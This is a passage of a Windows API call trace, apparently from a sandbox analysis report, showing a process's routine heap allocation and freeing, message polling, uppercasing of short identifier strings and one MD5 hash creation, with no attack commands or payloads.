hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.199] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.199] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.199] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.200] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.200] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.201] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.201] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.201] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.202] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.202] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.202] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.202] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.202] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.202] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.203] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.203] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.203] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.204] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0267.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0267.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0267.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.205] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.205] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.205] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.205] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0267.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.206] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0267.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.206] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.206] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.206] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.206] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.206] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.206] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.207] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.207] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.207] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.207] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.207] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.207] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.208] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.208] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.208] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.208] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.208] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.208] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.208] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.208] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.208] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.208] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.208] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0267.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.209] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 